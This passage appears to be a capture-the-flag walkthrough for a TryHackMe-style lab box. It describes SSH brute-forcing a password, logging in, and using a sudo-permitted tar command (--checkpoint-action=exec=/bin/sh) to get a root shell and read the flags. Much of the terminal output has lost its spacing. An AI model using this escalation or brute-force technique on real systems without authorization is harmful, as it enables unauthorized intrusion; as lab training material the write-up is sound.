By ssh bruteforce, one can find the user's password!
user.txt
Login into the ssh using the credentials found:
$sshlin@10.10.32.142Theauthenticityofhost'10.10.32.142 (10.10.32.142)'can't be established.ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.32.142' (ECDSA) to the list of known hosts.lin@10.10.32.142'spassword:WelcometoUbuntu16.04.6LTS (GNU/Linux 4.15.0-101-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantage83packagescanbeupdated.0updatesaresecurityupdates.Lastlogin:SunJun722:23:412020from192.168.0.14lin@bountyhacker:~/Desktop$lsuser.txtlin@bountyhacker:~/Desktop$catuser.txtTHM{REDACTED}
root.txt
Check sudo permissions
lin@bountyhacker:~$sudo-l[sudo] password for lin: MatchingDefaultsentriesforlinonbountyhacker:env_reset,mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUserlinmayrunthefollowingcommandsonbountyhacker: (root) /bin/tar
Priv Esc using tar
lin@bountyhacker:~$sudotar-cf/dev/null/dev/null--checkpoint=1--checkpoint-action=exec=/bin/shtar:Removingleading`/' from member names# id uid=0(root) gid=0(root) groups=0(root)# whoamiroot# cd /root # lsroot.txt# cat root.txtTHM{REDACTED}